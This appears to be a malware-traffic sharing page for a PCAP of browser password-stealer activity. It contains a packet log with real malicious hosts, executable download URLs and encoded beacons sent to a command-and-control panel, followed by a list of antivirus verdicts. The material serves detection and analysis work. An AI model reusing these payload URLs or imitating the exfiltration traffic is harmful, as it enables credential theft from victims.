POST /xx/Panel/fre.php kenion.com.mx RAT Browser Password Stealer Malware PCAP file download Traffic Sample

Download Attachments

  • 1 pcap xxcrypted
    Date added: November 30, 2017 2:43 am Added by: admin File size: 113 KB Downloads: 10


Malwarebytes for Home | Anti-Malware Premium | Free Trial Download

 

017-11-29 20:01:13.251874 IP 192.168.1.102.51041 > 108.179.194.43.80: Flags [P.], seq 3799269095:3799269589, ack 1911259101, win 256, length 494: HTTP: GET /doro/xxcryptrd.exe HTTP/1.1
E…8?@……..fl..+.a.P.t>.q…P….H..GET /doro/xxcryptrd.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: kenion.com.mx
Connection: Keep-Alive

2017-11-29 20:01:32.257071 IP 192.168.1.102.51041 > 108.179.194.43.80: Flags [P.], seq 494:984, ack 815851, win 2744, length 490: HTTP: GET /doro/stain.exe HTTP/1.1
E…9^@……..fl..+.a.P.t@.q…P.
…..GET /doro/stain.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: kenion.com.mx
Connection: Keep-Alive

2017-11-29 20:01:37.657627 IP 192.168.1.102.51042 > 185.115.242.195.80: Flags [P.], seq 1302127423:1302127670, ack 2428225756, win 256, length 247: HTTP: POST /xx/Panel/fre.php HTTP/1.0
E…iP@…”C…f.s…b.PM..?….P…x…POST /xx/Panel/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: estedoctorhair.com
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 6F8D7C5C
Content-Length: 208
Connection: close

2017-11-29 20:01:37.811087 IP 192.168.1.102.51042 > 185.115.242.195.80: Flags [P.], seq 247:455, ack 1, win 256, length 208: HTTP
E…iQ@…”i…f.s…b.PM..6….P…t…..’…….ckav.ru..
…r.y.4.w.n…….W.I.N.-.1.O.C.0.S.U.P.R.H.6.P…….W.I.N.-.1.O.C.0.S.U.P.R.H.6.P…………………k……………..0…0.F.A.3.C.D.3.6.4.4.2.7.5.8.4.B.0.C.A.7.C.E.5.6…..HUKbe….
2017-11-29 20:01:38.556372 IP 192.168.1.102.51043 > 185.115.242.195.80: Flags [P.], seq 2513439678:2513439925, ack 1115178723, win 256, length 247: HTTP: POST /xx/Panel/fre.php HTTP/1.0
E…iV@…”=…f.s…c.P….BxF.P….<..POST /xx/Panel/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: estedoctorhair.com
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 6F8D7C5C
Content-Length: 208
Connection: close

2017-11-29 20:01:37.811087 IP 192.168.1.102.51042 > 185.115.242.195.80: Flags [P.], seq 247:455, ack 1, win 256, length 208: HTTP
E…iQ@…”i…f.s…b.PM..6….P…t…..’…….ckav.ru..
…r.y.4.w.n…….W.I.N.-.1.O.C.0.S.U.P.R.H.6.P…….W.I.N.-.1.O.C.0.S.U.P.R.H.6.P…………………k……………..0…0.F.A.3.C.D.3.6.4.4.2.7.5.8.4.B.0.C.A.7.C.E.5.6…..HUKbe….
2017-11-29 20:01:38.556372 IP 192.168.1.102.51043 > 185.115.242.195.80: Flags [P.], seq 2513439678:2513439925, ack 1115178723, win 256, length 247: HTTP: POST /xx/Panel/fre.php HTTP/1.0
E…iV@…”=…f.s…c.P….BxF.P….<..POST /xx/Panel/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: estedoctorhair.com
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 6F8D7C5C
Content-Length: 208
Connection: close

2017-11-29 20:01:38.708255 IP 192.168.1.102.51043 > 185.115.242.195.80: Flags [P.], seq 247:455, ack 1, win 256, length 208: HTTP
E…iW@…”c…f.s…c.P….BxF.P………’…….ckav.ru..
…r.y.4.w.n…….W.I.N.-.1.O.C.0.S.U.P.R.H.6.P…….W.I.N.-.1.O.C.0.S.U.P.R.H.6.P………………….+…………….0…0.F.A.3.C.D.3.6.4.4.2.7.5.8.4.B.0.C.A.7.C.E.5.6…..1K1CK….
2017-11-29 20:01:51.440066 IP 192.168.1.102.51041 > 108.179.194.43.80: Flags [P.], seq 984:1477, ack 1901526, win 2747, length 493: HTTP: GET /doro/ladipony.exe HTTP/1.1
E…:.@……..fl..+.a.P.tB.r…P.
…..GET /doro/ladipony.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: kenion.com.mx
Connection: Keep-Alive

2017-11-29 20:01:51.567952 IP 192.168.1.102.51041 > 108.179.194.43.80: Flags [P.], seq 1477:1845, ack 1906198, win 2748, length 368: HTTP: GET /cgi-sys/js/simple-expand.min.js HTTP/1.1
E…:.@……..fl..+.a.P.tD.r…P.
…..GET /cgi-sys/js/simple-expand.min.js HTTP/1.1
Accept: */*
Referer: http://kenion.com.mx/doro/ladipony.exe
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: kenion.com.mx
Connection: Keep-Alive

2017-11-29 20:01:51.682603 IP 192.168.1.102.51044 > 151.139.237.113.80: Flags [P.], seq 663312641:663312995, ack 1475467799, win 256, length 354: HTTP: GET /jquery-1.9.1.js HTTP/1.1
E…*.@……..f…q.d.P’.Y.W…P…….GET /jquery-1.9.1.js HTTP/1.1
Accept: */*
Referer: http://kenion.com.mx/doro/ladipony.exe
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: code.jquery.com
Connection: Keep-Alive

2017-11-29 20:01:51.952649 IP 192.168.1.102.51045 > 108.179.194.43.80: Flags [P.], seq 330237517:330237885, ack 584175579, win 256, length 368: HTTP: GET /cgi-sys/js/simple-expand.min.js HTTP/1.1
E…:.@……..fl..+.e.P…M”…P…….GET /cgi-sys/js/simple-expand.min.js HTTP/1.1
Accept: */*
Referer: http://kenion.com.mx/doro/ladipony.exe
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: kenion.com.mx
Connection: Keep-Alive

2017-11-29 20:01:52.021644 IP 192.168.1.102.51045 > 108.179.194.43.80: Flags [P.], seq 368:725, ack 1408, win 251, length 357: HTTP: GET /cgi-sys/images/x.png HTTP/1.1
E…:.@……..fl..+.e.P….”..ZP…s…GET /cgi-sys/images/x.png HTTP/1.1
Accept: */*
Referer: http://kenion.com.mx/doro/ladipony.exe
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: kenion.com.mx
Connection: Keep-Alive

2017-11-29 20:01:52.084717 IP 192.168.1.102.51045 > 108.179.194.43.80: Flags [P.], seq 725:1089, ack 4297, win 256, length 364: HTTP: GET /cgi-sys/images/404top_w.jpg HTTP/1.1
E…:.@……..fl..+.e.P.. “”…P…Z…GET /cgi-sys/images/404top_w.jpg HTTP/1.1
Accept: */*
Referer: http://kenion.com.mx/doro/ladipony.exe
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: kenion.com.mx
Connection: Keep-Alive

2017-11-29 20:01:56.316040 IP 192.168.1.102.51048 > 185.115.242.195.80: Flags [P.], seq 247:428, ack 1, win 256, length 181: HTTP
E…i]@…”x…f.s…h.P…..pe.P….2….(…….ckav.ru..
…r.y.4.w.n…….W.I.N.-.1.O.C.0.S.U.P.R.H.6.P…….W.I.N.-.1.O.C.0.S.U.P.R.H.6.P…………………….0…0.F.A.3.C.D.3.6.4.4.2.7.5.8.4.B.0.C.A.7.C.E.5.6.
2017-11-29 20:02:00.531476 IP 192.168.1.102.51045 > 108.179.194.43.80: Flags [P.], seq 1089:1581, ack 8850, win 256, length 492: HTTP: GET /doro/crypted.exe HTTP/1.1
E…:.@……..fl..+.e.P..
.”..lP….v..GET /doro/crypted.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: kenion.com.mx
Connection: Keep-Alive

2017-11-29 20:02:17.640089 IP 192.168.1.102.51046 > 108.179.194.43.80: Flags [P.], seq 362:853, ack 337, win 255, length 491: HTTP: GET /doro/africa.exe HTTP/1.1
E…< @……..fl..+.f.P..l.y…P…….GET /doro/africa.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: kenion.com.mx
Connection: Keep-Alive

2017-11-29 20:02:51.417112 IP 192.168.1.102.51049 > 66.171.248.178.80: Flags [P.], seq 2814971291:2814971366, ack 1344969828, win 256, length 75: HTTP: GET / HTTP/1.1
E..s,.@…. …fB….i.P….P*.dP…….GET / HTTP/1.1
Host: bot.whatismyipaddress.com
Connection: Keep-Alive

2017-11-29 20:02:57.405090 IP 192.168.1.102.51051 > 185.115.242.195.80: Flags [P.], seq 1441112571:1441112818, ack 42778969, win 256, length 247: HTTP: POST /xx/Panel/fre.php HTTP/1.0
E…ib@…”1…f.s…k.PU……YP…?`..POST /xx/Panel/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: estedoctorhair.com
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 6F8D7C5C
Content-Length: 181
Connection: close

 

46 engines detected this file
SHA-256 d9a44b31bfde7395266063597831eb08aa399dadc9a63523daee4918aabb5d34
File name 64272963f1afd4b648294f716aea0737.exe
File size 796.5 KB
Last analysis 2017-11-29 23:59:23 UTC
Community score -46

Ad-Aware

Trojan.Agent.CRAT

AegisLab

Troj.Agent.Crat!c

AhnLab-V3

Trojan/Win32.Inject.R213890

ALYac

Trojan.Agent.CRAT

Antiy-AVL

Trojan/MSIL.Crypt

Arcabit

Trojan.Agent.CRAT

Avast

Win32:Malware-gen

AVG

Win32:Malware-gen

Avira

TR/AD.BrowserPwdStealer.kaouc

AVware

Trojan.Win32.Generic!BT

BitDefender

Trojan.Agent.CRAT

CrowdStrike Falcon

malicious_confidence_100% (W)

 

Leave a Reply